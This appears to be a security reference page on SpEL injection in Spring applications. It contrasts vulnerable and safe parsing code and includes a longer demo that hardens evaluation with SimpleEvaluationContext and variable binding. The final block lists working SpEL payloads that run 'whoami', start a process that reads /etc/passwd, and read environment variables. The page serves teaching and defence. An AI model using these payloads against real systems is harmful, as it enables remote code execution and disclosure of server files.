SpEL Injection is a code injection vulnerability in applications that use the Spring Expression Language (SpEL). When user-controlled input is parsed and evaluated as a SpEL expression, an attacker can reference Spring beans, invoke arbitrary methods, and ultimately execute code on the server.
SpEL is a powerful expression language in the Spring Framework that supports querying and manipulating object graphs at runtime, including type references (`T(...)`), constructor calls and method invocation. If user input reaches `parseExpression()` and is evaluated against the default, unrestricted context, an attacker can use those same capabilities to execute code.
```java
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;

// Vulnerable: user input is parsed as SpEL and evaluated with the default StandardEvaluationContext
ExpressionParser parser = new SpelExpressionParser();
Expression exp = parser.parseExpression(userInput);
Object result = exp.getValue();

// Safe: evaluate in a SimpleEvaluationContext, which disables T(...), constructors and bean references
EvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();
Object safeResult = exp.getValue(context);
```
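The following is an added, self-contained example (not code from the original page or from the Spring project) that carries the restriction above through end to end. It evaluates a few constructed inputs, including the `T(...)` expressions listed on this page, against a `SimpleEvaluationContext` so that legitimate data-binding expressions succeed while type references and constructor calls are rejected with an `EvaluationException` before anything runs. It also shows the safer pattern for the common case where the application, not the user, owns the expression: the untrusted string is bound as a SpEL variable (`#input`) and never parsed as code. The `Order` class, its field values and the input strings are constructed for the demo.

```java
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.ExpressionException;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

public class SpelHardeningDemo {

    // Hypothetical root object: the only data a user-supplied expression is meant to read.
    public static class Order {
        private final String customer = "alice";
        private final int quantity = 3;
        public String getCustomer() { return customer; }
        public int getQuantity() { return quantity; }
    }

    private static final ExpressionParser PARSER = new SpelExpressionParser();

    // Evaluates expr against a locked-down context: read-only property access on the root
    // object plus operators. Type references (T(...)), constructors (new ...), bean
    // references (@bean) and method invocation fail with an EvaluationException.
    public static Object evaluateRestricted(String expr, Object root) {
        EvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding()
                .withRootObject(root)
                .build();
        return PARSER.parseExpression(expr).getValue(ctx);
    }

    // Preferred pattern when the application owns the expression: the untrusted value is
    // bound as the variable #input and compared as data, so it is never parsed as SpEL.
    public static boolean matchesCustomer(String untrustedInput, Object root) {
        StandardEvaluationContext ctx = new StandardEvaluationContext(root);
        ctx.setVariable("input", untrustedInput);
        Boolean r = PARSER.parseExpression("customer == #input").getValue(ctx, Boolean.class);
        return Boolean.TRUE.equals(r);
    }

    public static void main(String[] args) {
        Order order = new Order();
        // Constructed inputs: two legitimate data-binding expressions followed by the
        // environment-read and command-execution expressions quoted on this page.
        String[] inputs = {
            "customer",
            "quantity * 2",
            "T(java.lang.System).getenv('PATH')",
            "T(java.lang.Runtime).getRuntime().exec('whoami')"
        };
        for (String expr : inputs) {
            try {
                System.out.println("ALLOWED  " + expr + " -> " + evaluateRestricted(expr, order));
            } catch (ExpressionException e) {
                // Expected for the T(...) inputs: SimpleEvaluationContext has no type locator,
                // so the expression is refused before Runtime or System is ever touched.
                System.out.println("REJECTED " + expr + " (" + e.getClass().getSimpleName() + ")");
            }
        }

        // Input treated as data: a payload string simply fails to equal the customer name.
        System.out.println(matchesCustomer("alice", order));
        System.out.println(matchesCustomer("T(java.lang.Runtime).getRuntime().exec('id')", order));
    }
}
```

Two caveats worth keeping in mind. `SimpleEvaluationContext.forReadOnlyDataBinding()` still lets an expression read any getter reachable from the root object, so choose a root that exposes only what the feature needs, and do not add `withInstanceMethods()` or `withMethodResolvers(...)` unless you have reviewed what those methods can reach. And `exp.getValue()` with no context argument silently falls back to a full `StandardEvaluationContext`, which is why the vulnerable snippet above is dangerous even though it never mentions a context at all.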
```text
# Execute system command
T(java.lang.Runtime).getRuntime().exec('whoami')
# Using ProcessBuilder
new java.lang.ProcessBuilder({'cat','/etc/passwd'}).start()
# Read file contents
new java.util.Scanner(new java.io.File('/etc/passwd')).useDelimiter('\\Z').next()
# Access environment variables
T(java.lang.System).getenv('PATH')
```